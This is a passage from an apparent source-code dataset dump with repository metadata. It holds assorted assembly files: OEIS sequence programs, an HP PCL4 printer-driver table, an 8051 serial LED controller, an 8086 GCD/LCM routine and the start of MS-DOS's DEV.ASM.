00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
| 44.931034 | 2,999 | 0.652149 |
286bfe4ab37ae9fb013d2795c06e9c9a2806b87f | 180 | asm | Assembly | uw2/call-eop-slidePanel.asm | JohnGlassmyer/UltimaHacks | f9a114e00c4a1edf1ac7792b465feff2c9b88ced | [
"MIT"
] | 68 | 2018-03-04T22:34:22.000Z | 2022-03-10T15:18:32.000Z | uw2/call-eop-slidePanel.asm | ptrie/UltimaHacks | 2c3557a86d94ad8b54b26bc395b9aed1604f8be1 | [
"MIT"
] | 19 | 2018-11-20T04:06:49.000Z | 2021-11-08T16:37:10.000Z | uw2/call-eop-slidePanel.asm | ptrie/UltimaHacks | 2c3557a86d94ad8b54b26bc395b9aed1604f8be1 | [
"MIT"
] | 4 | 2020-09-01T17:57:36.000Z | 2022-01-04T20:51:11.000Z | %include "../UltimaPatcher.asm"
%include "include/uw2.asm"
%include "include/uw2-eop.asm"
defineAddress 39, 0x0A30, animateSlidingPanel
%include "../uw1/call-eop-slidePanel.asm"
| 22.5 | 45 | 0.755556 |
d3ccc421afa562a640ff79682ab5fbb597628c3f | 415 | asm | Assembly | oeis/139/A139108.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/139/A139108.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/139/A139108.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A139108: Bisection of A139102.
; Submitted by Jamie Morken(s4)
; 2,37,2397,153437,157119967,40222711647,2574253545437,2636035630527967,674825121415159677,691020924329123509751,176901356628255618496351,181146989187333753340263903,741978067711319053681720948727
mul $0,2
add $0,1
seq $0,6093 ; a(n) = prime(n) - 1.
seq $0,118255 ; a(1)=1, then a(n)=2*a(n-1) if n is prime, a(n)=2*a(n-1)+1 if n not prime.
div $0,2
| 41.5 | 196 | 0.756627 |
018df8e9c4cc1b220fdf633af1cd5f7814a2851d | 7,258 | asm | Assembly | Driver/Printer/HP/Pcl4/pcl4DriverInfo.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 504 | 2018-11-18T03:35:53.000Z | 2022-03-29T01:02:51.000Z | Driver/Printer/HP/Pcl4/pcl4DriverInfo.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 96 | 2018-11-19T21:06:50.000Z | 2022-03-06T10:26:48.000Z | Driver/Printer/HP/Pcl4/pcl4DriverInfo.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 73 | 2018-11-19T20:46:53.000Z | 2022-03-29T00:59:26.000Z | COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) Berkeley Softworks 1990 -- All Rights Reserved
PROJECT: PC GEOS
MODULE: LaserJet printer driver
FILE: pcl4DriverInfo.asm
AUTHOR: Dave Durran
REVISION HISTORY:
Name Date Description
---- ---- -----------
Dave 1/92 Initial revision from laserdwnDriverInfo.asm
DESCRIPTION:
Driver info for the PCL 4 printer driver
The file "printerDriver.def" should be included before this one
$Id: pcl4DriverInfo.asm,v 1.1 97/04/18 11:52:22 newdeal Exp $
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Driver Info Resource
This part of the file contains the information that pertains to
all device supported by the driver. It includes device names and
a table of the resource handles for the specific device info. A
pointer to this info is provided by the DriverInfo function.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
DriverInfo segment lmem LMEM_TYPE_GENERAL
;----------------------------------------------------------------------------
; Device Enumerations
;----------------------------------------------------------------------------
ifdef GPC_ONLY
;
; GlobalPC printer drivers (compatibility modes only)
;
DefPrinter PD_HP_LASERJETS, "HP LaserJet Compatible", downloadInfo
else
;
; Default printer driver list (all known supported devices)
;
; The following models need to be officially tested:
; HP Laserjet 4050 Brother HL-631 Brother HL-730
;
DefPrinter PD_BLAZER_STAR_2, "Blazer Star II", internalInfo
DefPrinter PD_BROTHER_HL4, "Brother HL-4 (HP Mode)", internalInfo
DefPrinter PD_BROTHER_HL631, "Brother HL-631", laserjet2Info
DefPrinter PD_BROTHER_HL730, "Brother HL-730", internalInfo
DefPrinter PD_BROTHER_HL8E, "Brother HL-8e (HP Mode)", internalInfo
DefPrinter PD_BROTHER_HL8PS_HP, "Brother HL-8PS (HP Mode)", internalInfo
DefPrinter PD_CANON_LBP4SX, "Canon LBP-4SX (HP Mode)", downloadInfo
DefPrinter PD_CANON_LBP8SX, "Canon LBP-8SX (HP Mode)", downloadInfo
DefPrinter PD_DATAPRODUCTS_LZR1230, "Dataproducts LZR1230", totalResetInfo
DefPrinter PD_EPSON_AL_1000, "Epson ActionLaser 1000 (HP Mode)", downloadInfo
DefPrinter PD_EPSON_AL_1100, "Epson ActionLaser 1100 (HP Mode)", downloadInfo
DefPrinter PD_EPSON_AL_1400, "Epson ActionLaser 1400 (HP Mode)", downloadInfo
DefPrinter PD_EPSON_AL_1500, "Epson ActionLaser 1500 (HP Mode)", downloadInfo
DefPrinter PD_EPSON_EPL7000, "Epson EPL-7000 (HP Mode)", downloadInfo
DefPrinter PD_HP_LJ_PLUS, "HP LaserJet PLUS", internalInfo
DefPrinter PD_HP_LJ_500_PLUS, "HP LaserJet 500 PLUS", internalInfo
DefPrinter PD_HP_LJ_2, "HP LaserJet II", laserjet2Info
DefPrinter PD_HP_LJ_2D, "HP LaserJet IID", downloadDuplexInfo
DefPrinter PD_HP_LJ_2_COMP, "HP LaserJet II Compatible", laserjet2Info
DefPrinter PD_HP_LJ_2P, "HP LaserJet IIP", downloadInfo
DefPrinter PD_HP_LJ_2P_PLUS, "HP LaserJet IIP Plus", downloadInfo
DefPrinter PD_HP_LJ_3, "HP LaserJet III", downloadInfo
DefPrinter PD_HP_LJ_3D, "HP LaserJet IIID", laserjet3DInfo
DefPrinter PD_HP_LJ_3P, "HP LaserJet IIIP", downloadInfo
DefPrinter PD_HP_LJ_3SI, "HP LaserJet IIISi", laserjet3SiInfo
DefPrinter PD_HP_LJ_4, "HP LaserJet 4 (PCL Mode)", laserjet4Info
DefPrinter PD_HP_LJ_4_PLUS, "HP LaserJet 4 Plus", laserjet4Info
DefPrinter PD_HP_LJ_4M_HP, "HP LaserJet 4M (PCL Mode)", laserjet4Info
DefPrinter PD_HP_LJ_4L, "HP LaserJet 4L", downloadInfo
DefPrinter PD_HP_LJ_4SI, "HP LaserJet 4Si", laserjet3SiInfo
DefPrinter PD_HP_LJ_4050, "HP LaserJet 4050", laserjet4Info
DefPrinter PD_HP_LJ_5L, "HP LaserJet 5L", downloadInfo
DefPrinter PD_HP_LJ_5P, "HP LaserJet 5P", downloadInfo
DefPrinter PD_HP_LJ_5SI, "HP LaserJet 5Si", laserjet3SiInfo
DefPrinter PD_HP_PJ_XL300, "HP PaintJet XL300 (B/W)", paintjetxl300Info
DefPrinter PD_HP_PCL_DF, "HP PCL Download Font Driver ", downloadInfo
DefPrinter PD_IBM_4019_HP, "IBM 4019 LaserPrinter (PCL Mode)", ibm4019Info
DefPrinter PD_IBM_4019_PPDS, "IBM 4019 LaserPrinter (PPDS Mode)", ppdsInfo
DefPrinter PD_IBM_4029_HP, "IBM 4029 LaserPrinter (PCL Mode)", ibm4019Info
DefPrinter PD_IBM_4029_PPDS, "IBM 4029 LaserPrinter (PPDS Mode)", ppdsInfo
DefPrinter PD_IBM_4039_HP, "IBM 4039 LaserPrinter (PCL Mode)", ibm4039Info
DefPrinter PD_KYOCERA_F, "Kyocera F-Series", downloadInfo
DefPrinter PD_LEXMARK_4039_HP, "Lexmark 4039 (PCL Mode)", ibm4039Info
DefPrinter PD_MANN_TALLY_905, "Mannesmann Tally 905", internalInfo
DefPrinter PD_OKI_600E, "Okidata OL600e", downloadInfo
DefPrinter PD_OKI_810E, "Okidata OL810e", laserjet4Info
DefPrinter PD_OKI_830_HP, "Okidata OL830 (HP Mode)", laserjet2CompInfo
DefPrinter PD_OLIVETTI_PG306, "Olivetti PG 306 (HP Mode)", downloadInfo
DefPrinter PD_OLIVETTI_PG308, "Olivetti PG 308 (HP Mode)", downloadInfo
DefPrinter PD_PANASONIC_KXP4410, "Panasonic KX-P4410", downloadInfo
DefPrinter PD_PANASONIC_KXP4420, "Panasonic KX-P4420", laserjet2CompInfo
DefPrinter PD_PANASONIC_KXP4430, "Panasonic KX-P4430", downloadInfo
DefPrinter PD_PANASONIC_KXP4450, "Panasonic KX-P4450", internalInfo
DefPrinter PD_PANASONIC_KXP4450I, "Panasonic KX-P4450i", internalInfo
DefPrinter PD_PANASONIC_KXP4451, "Panasonic KX-P4451", downloadInfo
DefPrinter PD_PHILIPS_NMS1481_HP, "Philips NMS 1481 (HP Mode)", laserjet2Info
DefPrinter PD_STAR_LASER_4, "Star LaserPrinter 4 (HP Mode)", downloadInfo
DefPrinter PD_STAR_LASER_8, "Star LaserPrinter 8 (HP Mode)", internalInfo
DefPrinter PD_STAR_LASER_8_II, "Star LaserPrinter 8 II (HP Mode)", downloadInfo
DefPrinter PD_TANDY_LP400, "Tandy LP 400", downloadInfo
DefPrinter PD_TANDY_LP410_HP, "Tandy LP 410 (HP Mode)", downloadInfo
DefPrinter PD_TANDY_LP800_HP, "Tandy LP 800 (HP Mode)", downloadInfo
DefPrinter PD_TANDY_LP950, "Tandy LP 950", laserjet2Info
DefPrinter PD_TANDY_LP990, "Tandy LP 990", laserjet2Info
DefPrinter PD_TANDY_LP1000, "Tandy LP 1000", internalInfo
DefPrinter PD_TOSHIBA_PL_6_HP, "Toshiba PageLaser6 (HP Mode)", laserjet2Info
endif
;----------------------------------------------------------------------------
; Driver Info Header
;----------------------------------------------------------------------------
DriverExtendedInfoTable <
{}, ; lmem hdr
PrintDevice/2, ; # devices
offset deviceStrings, ; devices
offset deviceInfoTab ; info blocks
>
PrintDriverInfo < 30, ;device timout
PR_RESEND, ;
isoSubstitutions, ;ISO sub tab.
asciiTransTable,
PDT_PRINTER,
TRUE
>
;----------------------------------------------------------------------------
; Device String Table and Strings
;----------------------------------------------------------------------------
isoSubstitutions chunk.word 0ffffh ;no ISO Subs.
; ASCII Translation List for Foreign Language Versions
asciiTransTable chunk.char ";;",0
;create the Tables.....
PrinterTables
DriverInfo ends
| 45.080745 | 80 | 0.67553 |
d3fffe4ba2e5c6ccdb7d59a1457e34eb28210e61 | 2,585 | asm | Assembly | src/asm/rs232OLD.asm | javierquevedo/open-iroom | b4e6a5b1e1024d4baaf26c90c6df53898414f410 | [
"MIT"
] | null | null | null | src/asm/rs232OLD.asm | javierquevedo/open-iroom | b4e6a5b1e1024d4baaf26c90c6df53898414f410 | [
"MIT"
] | null | null | null | src/asm/rs232OLD.asm | javierquevedo/open-iroom | b4e6a5b1e1024d4baaf26c90c6df53898414f410 | [
"MIT"
] | null | null | null | TRANS_READY BIT 01H
ORDEN_PEND BIT 02H
BUFER EQU 030H
BUFERP EQU 03AH
TEMP EQU 03BH
LED EQU P2.0
ORG 0000H
LJMP START
org 0023H
LJMP RTI_RS232
ORG 0100H
ENCENDER_LED:
CLR LED
RET
APAGAR_LED: SETB LED
RET
SAY_HELLO: MOV DPH,#HIGH STR_HELLO
MOV DPL,#LOW STR_HELLO
LCALL WRITE_STRING
RET
COMPARAR_BUFER:
MOV A,#0
MOVC A,@A+DPTR
MOV R0,#BUFER
MOV TEMP,@R0
CJNE A,TEMP,COMPARAR_BUFER_NOT
INC R0
INC DPTR
BUCLE_COMPARAR_BUFER:
MOV A,#0
MOVC A,@A+DPTR
MOV R1,A
MOV A,@R0
CJNE R1,#0FFH,BC_COMPARAR_BUFER_ST0
LJMP COMPARAR_BUFER_YES
BC_COMPARAR_BUFER_ST0:
MOV TEMP,R1
CJNE A,TEMP,COMPARAR_BUFER_NOT
INC DPTR
INC R0
LJMP BUCLE_COMPARAR_BUFER
COMPARAR_BUFER_NOT:
MOV R1,#0
RET
COMPARAR_BUFER_YES:
MOV R1,#1
RET
EJECUTAR_BUFER:
MOV DPL,#LOW ON
MOV DPH,#HIGH ON
LCALL COMPARAR_BUFER
CJNE R1,#1,EB_ST0
LCALL ENCENDER_LED
JMP EJECUTAR_BUFER_END
EB_ST0: MOV DPL,#LOW OFF
MOV DPH,#HIGH OFF
LCALL COMPARAR_BUFER
CJNE R1,#1,EB_ST1
LCALL APAGAR_LED
JMP EJECUTAR_BUFER_END
EB_ST1: MOV DPL,#LOW HELLO
MOV DPH,#HIGH HELLO
LCALL COMPARAR_BUFER
CJNE R1,#1,EB_ST2
LCALL SAY_HELLO
JMP EJECUTAR_BUFER_END
EB_ST2: NOP
EJECUTAR_BUFER_END:
RET
RTI_RS232:
PUSH PSW
PUSH ACC
SETB RS0
SETB RS1
JNB RI,RTI_RS_WRITE
RTI_RS_READ: CLR RI
MOV A,SBUF
MOV SBUF,A
JNB TI,$
CLR TI
CJNE A,#00DH,RTI_RS_READ_ST0
SETB ORDEN_PEND
MOV BUFERP,#BUFER
LJMP RTI_RS_END
RTI_RS_READ_ST0:
MOV R0,BUFERP
CJNE R0,#BUFERP,RTI_RS_READ_ST1
MOV BUFERP,#BUFER
MOV R0,#BUFER
RTI_RS_READ_ST1:
MOV @R0,A
INC R0
MOV BUFERP,R0
LJMP RTI_RS_END
RTI_RS_WRITE: CLR TI
SETB TRANS_READY
RTI_RS_END: POP ACC
POP PSW
RETI
;;
WRITE_BYTE: JNB TRANS_READY,$
MOV SBUF,A
CLR TRANS_READY
RET
WRITE_STRING:
MOV A,#0
MOVC A,@A+DPTR
INC DPTR
CJNE A,#0FFH,WT_STAGE1
LJMP WRITE_STRING_END
WT_STAGE1:
LCALL WRITE_BYTE
JMP WRITE_STRING
WRITE_STRING_END:
RET
INIT_RS232:
MOV TH1,#243
MOV TMOD,#020H
MOV PCON,#080H
SETB TR1
MOV SCON,#050H
MOV BUFERP,#BUFER
SETB TRANS_READY
SETB ES
SETB EA
RET
START:
LCALL INIT_RS232
MOV DPH, #HIGH STR_WELCOME
MOV DPL, #LOW STR_WELCOME
LCALL WRITE_STRING
ETI: JNB ORDEN_PEND, BC_STAGE0
LCALL EJECUTAR_BUFER
CLR ORDEN_PEND
BC_STAGE0:
JMP ETI
ORG 1000H
STR_WELCOME: DB '< Comandos: encender, apagar, hello >',00Dh,0FFh
STR_HELLO: DB 'Nos conocemos?',00DH,0FFh
ORG 1D00H
ON: DB 'encender',0FFH
OFF: DB 'apagar',0FFH
HELLO: DB 'hello',0FFH
END
| 12.548544 | 65 | 0.707157 |
d70594c4b371b66671de311730f142f57aac694b | 1,668 | asm | Assembly | programs/oeis/157/A157914.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/157/A157914.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/157/A157914.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A157914: a(n) = 8*n^2 - 1.
; 7,31,71,127,199,287,391,511,647,799,967,1151,1351,1567,1799,2047,2311,2591,2887,3199,3527,3871,4231,4607,4999,5407,5831,6271,6727,7199,7687,8191,8711,9247,9799,10367,10951,11551,12167,12799,13447,14111,14791,15487,16199,16927,17671,18431,19207,19999,20807,21631,22471,23327,24199,25087,25991,26911,27847,28799,29767,30751,31751,32767,33799,34847,35911,36991,38087,39199,40327,41471,42631,43807,44999,46207,47431,48671,49927,51199,52487,53791,55111,56447,57799,59167,60551,61951,63367,64799,66247,67711,69191,70687,72199,73727,75271,76831,78407,79999,81607,83231,84871,86527,88199,89887,91591,93311,95047,96799,98567,100351,102151,103967,105799,107647,109511,111391,113287,115199,117127,119071,121031,123007,124999,127007,129031,131071,133127,135199,137287,139391,141511,143647,145799,147967,150151,152351,154567,156799,159047,161311,163591,165887,168199,170527,172871,175231,177607,179999,182407,184831,187271,189727,192199,194687,197191,199711,202247,204799,207367,209951,212551,215167,217799,220447,223111,225791,228487,231199,233927,236671,239431,242207,244999,247807,250631,253471,256327,259199,262087,264991,267911,270847,273799,276767,279751,282751,285767,288799,291847,294911,297991,301087,304199,307327,310471,313631,316807,319999,323207,326431,329671,332927,336199,339487,342791,346111,349447,352799,356167,359551,362951,366367,369799,373247,376711,380191,383687,387199,390727,394271,397831,401407,404999,408607,412231,415871,419527,423199,426887,430591,434311,438047,441799,445567,449351,453151,456967,460799,464647,468511,472391,476287,480199,484127,488071,492031,496007,499999
mov $1,2
add $1,$0
mul $1,$0
mul $1,8
add $1,7
| 185.333333 | 1,590 | 0.82554 |
c4d78f63256bcf869cd6ad86580f49f87477b73a | 729 | asm | Assembly | oeis/100/A100449.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/100/A100449.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/100/A100449.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A100449: Number of ordered pairs (i,j) with |i| + |j| <= n and gcd(i,j) <= 1.
; Submitted by Jon Maiga
; 1,5,9,17,25,41,49,73,89,113,129,169,185,233,257,289,321,385,409,481,513,561,601,689,721,801,849,921,969,1081,1113,1233,1297,1377,1441,1537,1585,1729,1801,1897,1961,2121,2169,2337,2417,2513,2601,2785,2849,3017,3097,3225,3321,3529,3601,3761,3857,4001,4113,4345,4409,4649,4769,4913,5041,5233,5313,5577,5705,5881,5977,6257,6353,6641,6785,6945,7089,7329,7425,7737,7865,8081,8241,8569,8665,8921,9089,9313,9473,9825,9921,10209,10385,10625,10809,11097,11225,11609,11777,12017
lpb $0
sub $0,1
mov $2,$0
mov $0,0
max $2,0
seq $2,137243 ; Number of coprime pairs (a,b) with -n <= a,b <= n.
lpe
mov $0,$2
div $0,2
add $0,1
| 48.6 | 469 | 0.705075 |
aa248c164863321e78219385bfea1610b99f0e7d | 503 | asm | Assembly | oeis/192/A192803.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/192/A192803.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/192/A192803.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A192803: Coefficient of x^2 in the reduction of the polynomial (x+2)^n by x^3->x^2+x+1.
; Submitted by Christian Krause
; 0,0,1,7,34,144,575,2239,8632,33164,127297,488571,1875346,7199124,27637959,106107659,407374592,1564024808,6004739025,23053921567,88510638482,339817775144,1304657986015,5008956298247,19230819824088,73832632141076
mov $1,1
mov $3,1
lpb $0
sub $0,1
mul $2,2
add $4,$3
add $3,$1
sub $4,$1
sub $1,$4
sub $1,$4
sub $2,5
add $4,5
add $2,$4
mov $4,$2
lpe
mov $0,$2
| 23.952381 | 212 | 0.695825 |
4bab5fd83471bf7484256d273d2975337d557b9b | 1,287 | asm | Assembly | gcd&lcm.asm | skhasibulalam/asm-intro-8086 | d5252600e0f7487e59230e082833230794c803eb | [
"MIT"
] | null | null | null | gcd&lcm.asm | skhasibulalam/asm-intro-8086 | d5252600e0f7487e59230e082833230794c803eb | [
"MIT"
] | null | null | null | gcd&lcm.asm | skhasibulalam/asm-intro-8086 | d5252600e0f7487e59230e082833230794c803eb | [
"MIT"
] | null | null | null | CODE SEGMENT
ASSUME CS:CODE,DS:CODE
ORG 100H
MAIN: MOV AX,CS
MOV DS,AX
MOV AX,VAR1; GCD (a,b,c)
MOV BX,VAR2
MOV CX,VAR3
MOV DX,0
MOV EXT,AX
CALL FUN
MOV GCDALL,CX; GCD (a,b,c) ends
MOV AX,VAR1; GCD (a,b)
MOV BX,VAR2
MOV CX,VAR2
MOV DX,0
MOV EXT,AX
CALL FUN
MOV GCD12,CX; GCD (a,b) ends
MOV AX,VAR2; GCD (b,c)
MOV BX,VAR3
MOV CX,VAR3
MOV DX,0
MOV EXT,AX
CALL FUN
MOV GCD23,CX; GCD (b,c) ends
MOV AX,VAR1; GCD (c,a)
MOV BX,VAR3
MOV CX,VAR3
MOV DX,0
MOV EXT,AX
CALL FUN
MOV GCD31,CX; GCD (c,a) ends
MOV AX,VAR1; LCM (a,b,c)
; formula, LCM(a,b,c) = a*b*c * GCD(a,b,c) / [GCD(a,b) * GCD(b,c) * GCD(c,a)]
MOV DX,0
MUL VAR2
MUL VAR3
MUL GCDALL
DIV GCD12
MOV DX,0
DIV GCD23
MOV DX,0
DIV GCD31; LCM (a,b,c) ends
MOV AH,4CH
INT 21H
FUN PROC
JMP GCD
STA: MOV DX,0
MOV AX,EXT
DEC CX
CMP CX,1
JE DONE
GCD: DIV CX
CMP DX,0
JE CHK
JMP STA
CHK: MOV AX,BX
MOV DX,0
DIV CX
CMP DX,0
JE DONE
JMP STA
DONE: RET
FUN ENDP
ORG 600H
VAR1 DW 25; 1st input
VAR2 DW 15; 2nd input
VAR3 DW 10; 3rd input
; VAR1>VAR2>VAR3 for this code to work
EXT DW ?
GCD12 DW ?
GCD23 DW ?
GCD31 DW ?
GCDALL DW ?
CODE ENDS
END MAIN
| 14.965116 | 77 | 0.578089 |
67a0db241eb6c0d16606a3e31d5064c72662b8aa | 421 | asm | Assembly | programs/oeis/269/A269232.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/269/A269232.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/269/A269232.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A269232: a(n) = (n + 1)*(6*n^2 + 15*n + 4)/2.
; 2,25,87,206,400,687,1085,1612,2286,3125,4147,5370,6812,8491,10425,12632,15130,17937,21071,24550,28392,32615,37237,42276,47750,53677,60075,66962,74356,82275,90737,99760,109362,119561,130375,141822,153920,166687,180141
mov $2,$0
add $2,1
mov $3,$0
lpb $2
mov $0,$3
sub $2,1
sub $0,$2
mul $0,3
mov $4,2
add $4,$0
pow $4,2
sub $4,2
add $1,$4
lpe
mov $0,$1
| 22.157895 | 218 | 0.638955 |
79228979819c42f8398d45e3963f4b1fd178f92f | 443 | asm | Assembly | programs/oeis/209/A209529.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/209/A209529.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/209/A209529.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A209529: Half the number of (n+1)X(n+1) 0..2 arrays with every 2X2 subblock having exactly two distinct clockwise edge differences
; 5,25,257,6145,262145,25165825,4294967297,1649267441665,1125899906842625,1729382256910270465,4722366482869645213697,29014219670751100192948225,316912650057057350374175801345,7788445287802241442795744493830145
add $0,2
pow $0,2
seq $0,136252 ; a(n) = a(n-1) + 2*a(n-2) - 2*a(n-3).
sub $0,13
div $0,4
add $0,5
| 44.3 | 209 | 0.781038 |
e515d6580d7e9973b7b7d60a2a7f0f5783d1cc66 | 26,003 | asm | Assembly | dos/dev.asm | minblock/msdos | 479ffd237d9bb7cc83cb06361db2c4ef42dfbac0 | [
"Apache-2.0"
] | null | null | null | dos/dev.asm | minblock/msdos | 479ffd237d9bb7cc83cb06361db2c4ef42dfbac0 | [
"Apache-2.0"
] | null | null | null | dos/dev.asm | minblock/msdos | 479ffd237d9bb7cc83cb06361db2c4ef42dfbac0 | [
"Apache-2.0"
] | null | null | null | TITLE DEV - Device call routines
NAME Dev
;
; Microsoft Confidential
; Copyright (C) Microsoft Corporation 1991
; All Rights Reserved.
;
;** Misc Routines to do 1-12 low level I/O and call devices
;
; IOFUNC
; DEVIOCALL
; SETREAD
; SETWRITE
; DEVIOCALL2
; DEV_OPEN_SFT
; DEV_CLOSE_SFT
; RW_SC
; IN_SC
; INVALIDATE_SC
; VIRREAD
; SC2BUF
;
; Revision history:
;
; A000 version 4.00 Jan. 1988
; A010 disable change line for SHARE /NC
.xlist
.xcref
include version.inc
include dosseg.inc
INCLUDE DOSSYM.INC
INCLUDE DEVSYM.INC
include dpb.inc
include sf.inc
.cref
.list
i_need IOXAD,DWORD
i_need IOSCNT,WORD
i_need DEVIOBUF,4
i_need IOCALL,BYTE
i_need IOMED,BYTE
i_need IORCHR,BYTE
i_need CALLSCNT,WORD
i_need DMAAdd,DWORD
i_need CallDevAd,DWORD
i_need CallXAD,DWORD
i_need DPBHead,DWORD
i_need ThisSFT,DWORD
i_need ThisDPB,DWORD
i_need DevCall,DWORD
i_need VerFlg,BYTE
i_need HIGH_SECTOR,WORD ;AN000;
i_need CALLSSEC,WORD ;AN000;
i_need CALLNEWSC,DWORD ;AN000;
i_need SC_CACHE_COUNT,WORD ;AN000;
i_need SC_CACHE_PTR,DWORD ;AN000;
i_need CURSC_SECTOR,WORD ;AN000;
i_need SEQ_SECTOR,DWORD ;AN000;
i_need SC_SECTOR_SIZE,WORD ;AN000;
i_need CURSC_DRIVE,BYTE ;AN000;
i_need SC_DRIVE,BYTE ;AN000;
i_need SC_STATUS,WORD ;AN000;
i_need SC_FLAG,BYTE ;AN000;
i_need TEMP_VAR,WORD ;AN000;
i_need TEMP_VAR2,WORD ;AN000;
i_need InterChar,BYTE ;AN000; interim character flag 2/13/KK
i_need InterCon,BYTE ;AN000; Console mode flag(1:interim mode) 2/13/KK
i_need SaveCurFlg,BYTE ;AN000; Console out mode(1:print & don't adv cursor) 2 /13/KK
